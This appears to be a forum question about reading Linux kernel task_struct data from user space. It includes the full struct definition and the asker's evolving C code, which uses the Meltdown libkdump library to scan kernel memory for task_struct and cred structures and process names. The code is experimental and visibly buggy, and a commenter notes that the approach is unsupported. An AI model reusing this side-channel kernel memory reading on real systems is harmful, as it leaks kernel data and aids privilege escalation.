# Direct access to structure task_struct from Usermode as root

Tags: c, linux, linux-kernel, user-mode-linux

I know it is supposed to be used in Kernel Modules.

But if I want to pass a pointer to struct task_struct and read the data (for example process name) from it in user mode with root privileges, will it be possible?

I want to access raw virtual addresses, and hope it will be a struct task_struct structure if not, go further. It will be kind of brute forcing virtual address for task_structs.

Do I have to go through Kernel Headers and import struct definitions manually to read each bytes?

Thanks,

Started to hack my way through Kernel, but it seem it will be a lot of stucts to work with:

```
struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
    /*
     * For reasons of header soup (see current_thread_info()), this
     * must be the first element of task_struct.
     */
    struct thread_info      thread_info;
#endif
    /* -1 unrunnable, 0 runnable, >0 stopped: */
    volatile long           state;

    /*
     * This begins the randomizable portion of task_struct. Only
     * scheduling-critical items should be added above here.
     */
    randomized_struct_fields_start

    void                *stack;
    atomic_t            usage;
    /* Per task flags (PF_*), defined further below: */
    unsigned int            flags;
    unsigned int            ptrace;

#ifdef CONFIG_SMP
    struct llist_node       wake_entry;
    int             on_cpu;
#ifdef CONFIG_THREAD_INFO_IN_TASK
    /* Current CPU: */
    unsigned int            cpu;
#endif
    unsigned int            wakee_flips;
    unsigned long           wakee_flip_decay_ts;
    struct task_struct      *last_wakee;

    int             wake_cpu;
#endif
    int             on_rq;

    int             prio;
    int             static_prio;
    int             normal_prio;
    unsigned int            rt_priority;

    const struct sched_class    *sched_class;
    struct sched_entity     se;
    struct sched_rt_entity      rt;
#ifdef CONFIG_CGROUP_SCHED
    struct task_group       *sched_task_group;
#endif
    struct sched_dl_entity      dl;

#ifdef CONFIG_PREEMPT_NOTIFIERS
    /* List of struct preempt_notifier: */
    struct hlist_head       preempt_notifiers;
#endif

#ifdef CONFIG_BLK_DEV_IO_TRACE
    unsigned int            btrace_seq;
#endif

    unsigned int            policy;
    int             nr_cpus_allowed;
    cpumask_t           cpus_allowed;

#ifdef CONFIG_PREEMPT_RCU
    int             rcu_read_lock_nesting;
    union rcu_special       rcu_read_unlock_special;
    struct list_head        rcu_node_entry;
    struct rcu_node         *rcu_blocked_node;
#endif /* #ifdef CONFIG_PREEMPT_RCU */

#ifdef CONFIG_TASKS_RCU
    unsigned long           rcu_tasks_nvcsw;
    bool                rcu_tasks_holdout;
    struct list_head        rcu_tasks_holdout_list;
    int             rcu_tasks_idle_cpu;
#endif /* #ifdef CONFIG_TASKS_RCU */

    struct sched_info       sched_info;

    struct list_head        tasks;
#ifdef CONFIG_SMP
    struct plist_node       pushable_tasks;
    struct rb_node          pushable_dl_tasks;
#endif

    struct mm_struct        *mm;
    struct mm_struct        *active_mm;

    /* Per-thread vma caching: */
    struct vmacache         vmacache;

#ifdef SPLIT_RSS_COUNTING
    struct task_rss_stat        rss_stat;
#endif
    int             exit_state;
    int             exit_code;
    int             exit_signal;
    /* The signal sent when the parent dies: */
    int             pdeath_signal;
    /* JOBCTL_*, siglock protected: */
    unsigned long           jobctl;

    /* Used for emulating ABI behavior of previous Linux versions: */
    unsigned int            personality;

    /* Scheduler bits, serialized by scheduler locks: */
    unsigned            sched_reset_on_fork:1;
    unsigned            sched_contributes_to_load:1;
    unsigned            sched_migrated:1;
    unsigned            sched_remote_wakeup:1;
    /* Force alignment to the next boundary: */
    unsigned            :0;

    /* Unserialized, strictly 'current' */

    /* Bit to tell LSMs we're in execve(): */
    unsigned            in_execve:1;
    unsigned            in_iowait:1;
#ifndef TIF_RESTORE_SIGMASK
    unsigned            restore_sigmask:1;
#endif
#ifdef CONFIG_MEMCG
    unsigned            memcg_may_oom:1;
#ifndef CONFIG_SLOB
    unsigned            memcg_kmem_skip_account:1;
#endif
#endif
#ifdef CONFIG_COMPAT_BRK
    unsigned            brk_randomized:1;
#endif
#ifdef CONFIG_CGROUPS
    /* disallow userland-initiated cgroup migration */
    unsigned            no_cgroup_migration:1;
#endif

    unsigned long           atomic_flags; /* Flags requiring atomic access. */

    struct restart_block        restart_block;

    pid_t               pid;
    pid_t               tgid;

#ifdef CONFIG_CC_STACKPROTECTOR
    /* Canary value for the -fstack-protector GCC feature: */
    unsigned long           stack_canary;
#endif
    /*
     * Pointers to the (original) parent process, youngest child, younger sibling,
     * older sibling, respectively.  (p->father can be replaced with
     * p->real_parent->pid)
     */

    /* Real parent process: */
    struct task_struct __rcu    *real_parent;

    /* Recipient of SIGCHLD, wait4() reports: */
    struct task_struct __rcu    *parent;

    /*
     * Children/sibling form the list of natural children:
     */
    struct list_head        children;
    struct list_head        sibling;
    struct task_struct      *group_leader;

    /*
     * 'ptraced' is the list of tasks this task is using ptrace() on.
     *
     * This includes both natural children and PTRACE_ATTACH targets.
     * 'ptrace_entry' is this task's link on the p->parent->ptraced list.
     */
    struct list_head        ptraced;
    struct list_head        ptrace_entry;

    /* PID/PID hash table linkage. */
    struct pid_link         pids[PIDTYPE_MAX];
    struct list_head        thread_group;
    struct list_head        thread_node;

    struct completion       *vfork_done;

    /* CLONE_CHILD_SETTID: */
    int __user          *set_child_tid;

    /* CLONE_CHILD_CLEARTID: */
    int __user          *clear_child_tid;

    u64             utime;
    u64             stime;
#ifdef CONFIG_ARCH_HAS_SCALED_CPUTIME
    u64             utimescaled;
    u64             stimescaled;
#endif
    u64             gtime;
    struct prev_cputime     prev_cputime;
#ifdef CONFIG_VIRT_CPU_ACCOUNTING_GEN
    struct vtime            vtime;
#endif

#ifdef CONFIG_NO_HZ_FULL
    atomic_t            tick_dep_mask;
#endif
    /* Context switch counts: */
    unsigned long           nvcsw;
    unsigned long           nivcsw;

    /* Monotonic time in nsecs: */
    u64             start_time;

    /* Boot based time in nsecs: */
    u64             real_start_time;

    /* MM fault and swap info: this can arguably be seen as either mm-specific or thread-specific: */
    unsigned long           min_flt;
    unsigned long           maj_flt;

#ifdef CONFIG_POSIX_TIMERS
    struct task_cputime     cputime_expires;
    struct list_head        cpu_timers[3];
#endif

    /* Process credentials: */

    /* Tracer's credentials at attach: */
    const struct cred __rcu     *ptracer_cred;

    /* Objective and real subjective task credentials (COW): */
    const struct cred __rcu     *real_cred;

    /* Effective (overridable) subjective task credentials (COW): */
    const struct cred __rcu     *cred;

    /*
     * executable name, excluding path.
     *
     * - normally initialized setup_new_exec()
     * - access it with [gs]et_task_comm()
     * - lock it with task_lock()
     */
    char                comm[TASK_COMM_LEN];

    struct nameidata        *nameidata;

#ifdef CONFIG_SYSVIPC
    struct sysv_sem         sysvsem;
    struct sysv_shm         sysvshm;
#endif
#ifdef CONFIG_DETECT_HUNG_TASK
    unsigned long           last_switch_count;
#endif
    /* Filesystem information: */
    struct fs_struct        *fs;

    /* Open file information: */
    struct files_struct     *files;

    /* Namespaces: */
    struct nsproxy          *nsproxy;

    /* Signal handlers: */
    struct signal_struct        *signal;
    struct sighand_struct       *sighand;
    sigset_t            blocked;
    sigset_t            real_blocked;
    /* Restored if set_restore_sigmask() was used: */
    sigset_t            saved_sigmask;
    struct sigpending       pending;
    unsigned long           sas_ss_sp;
    size_t              sas_ss_size;
    unsigned int            sas_ss_flags;

    struct callback_head        *task_works;

    struct audit_context        *audit_context;
#ifdef CONFIG_AUDITSYSCALL
    kuid_t              loginuid;
    unsigned int            sessionid;
#endif
    struct seccomp          seccomp;

    /* Thread group tracking: */
    u32             parent_exec_id;
    u32             self_exec_id;

    /* Protection against (de-)allocation: mm, files, fs, tty, keyrings, mems_allowed, mempolicy: */
    spinlock_t          alloc_lock;

    /* Protection of the PI data structures: */
    raw_spinlock_t          pi_lock;

    struct wake_q_node      wake_q;

#ifdef CONFIG_RT_MUTEXES
    /* PI waiters blocked on a rt_mutex held by this task: */
    struct rb_root          pi_waiters;
    struct rb_node          *pi_waiters_leftmost;
    /* Updated under owner's pi_lock and rq lock */
    struct task_struct      *pi_top_task;
    /* Deadlock detection and priority inheritance handling: */
    struct rt_mutex_waiter      *pi_blocked_on;
#endif

#ifdef CONFIG_DEBUG_MUTEXES
    /* Mutex deadlock detection: */
    struct mutex_waiter     *blocked_on;
#endif

#ifdef CONFIG_TRACE_IRQFLAGS
    unsigned int            irq_events;
    unsigned long           hardirq_enable_ip;
    unsigned long           hardirq_disable_ip;
    unsigned int            hardirq_enable_event;
    unsigned int            hardirq_disable_event;
    int             hardirqs_enabled;
    int             hardirq_context;
    unsigned long           softirq_disable_ip;
    unsigned long           softirq_enable_ip;
    unsigned int            softirq_disable_event;
    unsigned int            softirq_enable_event;
    int             softirqs_enabled;
    int             softirq_context;
#endif

#ifdef CONFIG_LOCKDEP
# define MAX_LOCK_DEPTH         48UL
    u64             curr_chain_key;
    int             lockdep_depth;
    unsigned int            lockdep_recursion;
    struct held_lock        held_locks[MAX_LOCK_DEPTH];
    gfp_t               lockdep_reclaim_gfp;
#endif

#ifdef CONFIG_UBSAN
    unsigned int            in_ubsan;
#endif

    /* Journalling filesystem info: */
    void                *journal_info;

    /* Stacked block device info: */
    struct bio_list         *bio_list;

#ifdef CONFIG_BLOCK
    /* Stack plugging: */
    struct blk_plug         *plug;
#endif

    /* VM state: */
    struct reclaim_state        *reclaim_state;

    struct backing_dev_info     *backing_dev_info;

    struct io_context       *io_context;

    /* Ptrace state: */
    unsigned long           ptrace_message;
    siginfo_t           *last_siginfo;

    struct task_io_accounting   ioac;
#ifdef CONFIG_TASK_XACCT
    /* Accumulated RSS usage: */
    u64             acct_rss_mem1;
    /* Accumulated virtual memory usage: */
    u64             acct_vm_mem1;
    /* stime + utime since last update: */
    u64             acct_timexpd;
#endif
#ifdef CONFIG_CPUSETS
    /* Protected by ->alloc_lock: */
    nodemask_t          mems_allowed;
    /* Seqence number to catch updates: */
    seqcount_t          mems_allowed_seq;
    int             cpuset_mem_spread_rotor;
    int             cpuset_slab_spread_rotor;
#endif
#ifdef CONFIG_CGROUPS
    /* Control Group info protected by css_set_lock: */
    struct css_set __rcu        *cgroups;
    /* cg_list protected by css_set_lock and tsk->alloc_lock: */
    struct list_head        cg_list;
#endif
#ifdef CONFIG_INTEL_RDT
    u32             closid;
    u32             rmid;
#endif
#ifdef CONFIG_FUTEX
    struct robust_list_head __user  *robust_list;
#ifdef CONFIG_COMPAT
    struct compat_robust_list_head __user *compat_robust_list;
#endif
    struct list_head        pi_state_list;
    struct futex_pi_state       *pi_state_cache;
#endif
#ifdef CONFIG_PERF_EVENTS
    struct perf_event_context   *perf_event_ctxp[perf_nr_task_contexts];
    struct mutex            perf_event_mutex;
    struct list_head        perf_event_list;
#endif
#ifdef CONFIG_DEBUG_PREEMPT
    unsigned long           preempt_disable_ip;
#endif
#ifdef CONFIG_NUMA
    /* Protected by alloc_lock: */
    struct mempolicy        *mempolicy;
    short               il_prev;
    short               pref_node_fork;
#endif
#ifdef CONFIG_NUMA_BALANCING
    int             numa_scan_seq;
    unsigned int            numa_scan_period;
    unsigned int            numa_scan_period_max;
    int             numa_preferred_nid;
    unsigned long           numa_migrate_retry;
    /* Migration stamp: */
    u64             node_stamp;
    u64             last_task_numa_placement;
    u64             last_sum_exec_runtime;
    struct callback_head        numa_work;

    struct list_head        numa_entry;
    struct numa_group       *numa_group;

    /*
     * numa_faults is an array split into four regions:
     * faults_memory, faults_cpu, faults_memory_buffer, faults_cpu_buffer
     * in this precise order.
     *
     * faults_memory: Exponential decaying average of faults on a per-node
     * basis. Scheduling placement decisions are made based on these
     * counts. The values remain static for the duration of a PTE scan.
     * faults_cpu: Track the nodes the process was running on when a NUMA
     * hinting fault was incurred.
     * faults_memory_buffer and faults_cpu_buffer: Record faults per node
     * during the current scan window. When the scan completes, the counts
     * in faults_memory and faults_cpu decay and these values are copied.
     */
    unsigned long           *numa_faults;
    unsigned long           total_numa_faults;

    /*
     * numa_faults_locality tracks if faults recorded during the last
     * scan window were remote/local or failed to migrate. The task scan
     * period is adapted based on the locality of the faults with different
     * weights depending on whether they were shared or private faults
     */
    unsigned long           numa_faults_locality[3];

    unsigned long           numa_pages_migrated;
#endif /* CONFIG_NUMA_BALANCING */

    struct tlbflush_unmap_batch tlb_ubc;

    struct rcu_head         rcu;

    /* Cache last used pipe for splice(): */
    struct pipe_inode_info      *splice_pipe;

    struct page_frag        task_frag;

#ifdef CONFIG_TASK_DELAY_ACCT
    struct task_delay_info      *delays;
#endif

#ifdef CONFIG_FAULT_INJECTION
    int             make_it_fail;
    unsigned int            fail_nth;
#endif
    /*
     * When (nr_dirtied >= nr_dirtied_pause), it's time to call
     * balance_dirty_pages() for a dirty throttling pause:
     */
    int             nr_dirtied;
    int             nr_dirtied_pause;
    /* Start of a write-and-pause period: */
    unsigned long           dirty_paused_when;

#ifdef CONFIG_LATENCYTOP
    int             latency_record_count;
    struct latency_record       latency_record[LT_SAVECOUNT];
#endif
    /*
     * Time slack values; these are used to round up poll() and
     * select() etc timeout values. These are in nanoseconds.
     */
    u64             timer_slack_ns;
    u64             default_timer_slack_ns;

#ifdef CONFIG_KASAN
    unsigned int            kasan_depth;
#endif

#ifdef CONFIG_FUNCTION_GRAPH_TRACER
    /* Index of current stored address in ret_stack: */
    int             curr_ret_stack;

    /* Stack of return addresses for return function tracing: */
    struct ftrace_ret_stack     *ret_stack;

    /* Timestamp for last schedule: */
    unsigned long long      ftrace_timestamp;

    /*
     * Number of functions that haven't been traced
     * because of depth overrun:
     */
    atomic_t            trace_overrun;

    /* Pause tracing: */
    atomic_t            tracing_graph_pause;
#endif

#ifdef CONFIG_TRACING
    /* State flags for use by tracers: */
    unsigned long           trace;

    /* Bitmask and counter of trace recursion: */
    unsigned long           trace_recursion;
#endif /* CONFIG_TRACING */

#ifdef CONFIG_KCOV
    /* Coverage collection mode enabled for this task (0 if disabled): */
    enum kcov_mode          kcov_mode;

    /* Size of the kcov_area: */
    unsigned int            kcov_size;

    /* Buffer for coverage collection: */
    void                *kcov_area;

    /* KCOV descriptor wired with this task or NULL: */
    struct kcov         *kcov;
#endif

#ifdef CONFIG_MEMCG
    struct mem_cgroup       *memcg_in_oom;
    gfp_t               memcg_oom_gfp_mask;
    int             memcg_oom_order;

    /* Number of pages to reclaim on returning to userland: */
    unsigned int            memcg_nr_pages_over_high;
#endif

#ifdef CONFIG_UPROBES
    struct uprobe_task      *utask;
#endif
#if defined(CONFIG_BCACHE) || defined(CONFIG_BCACHE_MODULE)
    unsigned int            sequential_io;
    unsigned int            sequential_io_avg;
#endif
#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
    unsigned long           task_state_change;
#endif
    int             pagefault_disabled;
#ifdef CONFIG_MMU
    struct task_struct      *oom_reaper_list;
#endif
#ifdef CONFIG_VMAP_STACK
    struct vm_struct        *stack_vm_area;
#endif
#ifdef CONFIG_THREAD_INFO_IN_TASK
    /* A live task holds one reference: */
    atomic_t            stack_refcount;
#endif
#ifdef CONFIG_LIVEPATCH
    int patch_state;
#endif
#ifdef CONFIG_SECURITY
    /* Used by LSM modules for access restriction: */
    void                *security;
#endif

    /*
     * New fields for task_struct should be added above here, so that
     * they are included in the randomized portion of task_struct.
     */
    randomized_struct_fields_end

    /* CPU-specific state of this task: */
    struct thread_struct        thread;

    /*
     * WARNING: on x86, 'thread_struct' contains a variable-sized
     * structure.  It *MUST* be at the end of 'task_struct'.
     *
     * Do not put anything below here!
     */
};
```

**Update 1:**

Starting to write this code, based on this:

https://github.com/jonoberheide/stackjacking/blob/master/stackjack.c

It seems it is possible.

I want to pass input a memory access (via Meltdown):

read_struct_task.c

```
#include "libkdump.h"
#include <stdio.h>
#include <stdlib.h>



int main(int argc, char *argv[]) {
    size_t phys;
    if (argc < 2) {
        printf("Usage: %s <physical address> [<direct physical map>]\n", argv[0]);
        return 0;
    }

    phys = strtoull(argv[1], NULL, 0);

    libkdump_config_t config;
    config = libkdump_get_autoconfig();
    if (argc > 2) {
        config.physical_offset = strtoull(argv[2], NULL, 0);
    }

    libkdump_init(config);

    size_t vaddr = libkdump_phys_to_virt(phys);

    printf("\x1b[32;1m[+]\x1b[0m Physical address       : \x1b[33;1m0x%zx\x1b[0m\n", phys);
    printf("\x1b[32;1m[+]\x1b[0m Physical offset        : \x1b[33;1m0x%zx\x1b[0m\n", config.physical_offset);
    printf("\x1b[32;1m[+]\x1b[0m Reading virtual address: \x1b[33;1m0x%zx\x1b[0m\n\n", vaddr);

    int i=0;
    int value[512];

    unsigned long task, cred, cred_ptr, real_cred, real_cred_ptr, val;
    unsigned found_cred = 0, uid = getuid();
    unsigned long * task_struct;


    while (1) {

        if(i==511)
        {
            task = value[0];

            printf("[*] Looking for task_struct at %lx\n", vaddr);

            task_struct = malloc(sizeof(long) * 0x200);

            printf("[*] Reading task_struct...\n");

            strncpy(task_struct, value, sizeof(long) * 0x200);

            printf("[*] Finding cred struct (grab a coffee)...\n");

            cred_ptr = task + 0x80;

            for (i = 0; i < 0x200; i++) {

                /* Looking for cred */
                if(!found_cred) {
                    cred = task_struct[i];


                    strncpy(&val, value, 4);
                    if((int)val == (int)uid) {

                            strncpy(&val, value, 4);

                        if((int)val == (int)uid) {
                            found_cred = 1;
                            real_cred_ptr = cred_ptr + 4;
                            printf("[*] cred struct ptr at %lx\n", cred_ptr);
                            printf("[*] cred struct at %lx\n", cred);
                            printf("[*] Finding real_cred struct...\n");
                            continue;
                        }
                    }
                    cred_ptr += sizeof(long);
                }
                /* Looking for real_cred */
                else {
                    real_cred = task_struct[i];


                    strncpy(&val, value, 4);

                    if((int)val == (int)uid) {

                        strncpy(&val, value, 4);

                        if((int)val == (int)uid)
                            break;
                    }
                    real_cred_ptr += sizeof(long);
                }
            }

            free(task_struct);

            printf("[*] real_cred struct ptr at %lx\n", real_cred_ptr);
            printf("[*] real_cred struct at %lx\n", real_cred);

            i=0;

        }
        value[i] = libkdump_read(vaddr);
        vaddr++;
        i++;
    }

    libkdump_cleanup();

    return 0;
}
```

**Update 2:**

I am not that experienced in this area.

1. Will the task_struct always be 512 bytes ? Kernel 3.2.x, 4.4.x? Do I have to manually calculate it for each Kernel? How?
2. How to find process name in this structure? Snippet in Update 1: is for cred struct.
3. Should I better use memcpy() instead of strncpy()?

A code sample would be great.

I guess to debug it I will need to write kernel module that shows me the pointer to task_struct and then verify it with my usermode program, if the values are read correctly.

Thanks!

**Update 3:**

I think I made a mistake. Long is 4 or 8 bytes. So the task_struck will be 512*4 bytes?

**Update 4:**

Or so the struct seem to be

```
size:5760
```

5760 bytes on Kernel 4.3.5

and the name of the process it the offset +996

Wondering if this is consistent among Kernels.

**Update 5:**

This should read processname and pid:

```
#include "libkdump.h"
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
  size_t phys;
  if (argc < 2) {
    printf("Usage: %s <physical address> [<direct physical map>]\n", argv[0]);
    return 0;
  }

  phys = strtoull(argv[1], NULL, 0);

  libkdump_config_t config;
  config = libkdump_get_autoconfig();
  if (argc > 2) {
    config.physical_offset = strtoull(argv[2], NULL, 0);
  }

  libkdump_init(config);

  size_t vaddr = libkdump_phys_to_virt(phys);

  printf("\x1b[32;1m[+]\x1b[0m Physical address       : \x1b[33;1m0x%zx\x1b[0m\n", phys);
  printf("\x1b[32;1m[+]\x1b[0m Physical offset        : \x1b[33;1m0x%zx\x1b[0m\n", config.physical_offset);
  printf("\x1b[32;1m[+]\x1b[0m Reading virtual address: \x1b[33;1m0x%zx\x1b[0m\n\n", vaddr);

char values[5760];
int pid=0;

  while (1) {
    for(int i=0;i<5760;i++)
    {
    values[i] = libkdump_read(vaddr);
    printf("%c\n",values[i]);
    vaddr++;
    }
    memcpy(&pid,values+768,sizeof(int));
    if(strcmp(values+996,"bash")==0)
      printf("addr:%p\tstr:%s\tpid:%i\n",vaddr,values+996,pid);

  }

  libkdump_cleanup();

  return 0;
}
```

Comment: your implemented update you pasted into your question looks to me as a self-answer. Post it as such and check-mark it as preferred solution ;-)

Comment: What's your question? :)

Comment: Thanks for your comments. I wrote Update 2: to specify what I am asking.

Comment: Also Update 3. I think I messed up the byte size of task_struct in code sample.

Comment: On 32bit I think it is 4 bytes and 64 bit 8 bytes

Comment: The problem is, you're trying to do something which is explicitly not supported, not endorsed by kernel maintainers and will guaranteedly break within a reasonably short time frame. If the information you're trying to obtain is not already exposed under `/proc/-pid-`, you can always write a small kernel module to expose whatever stuff you need via `debugfs` (or `proc`, or `netlink` or whatever other mechanism available for kernel - user communication).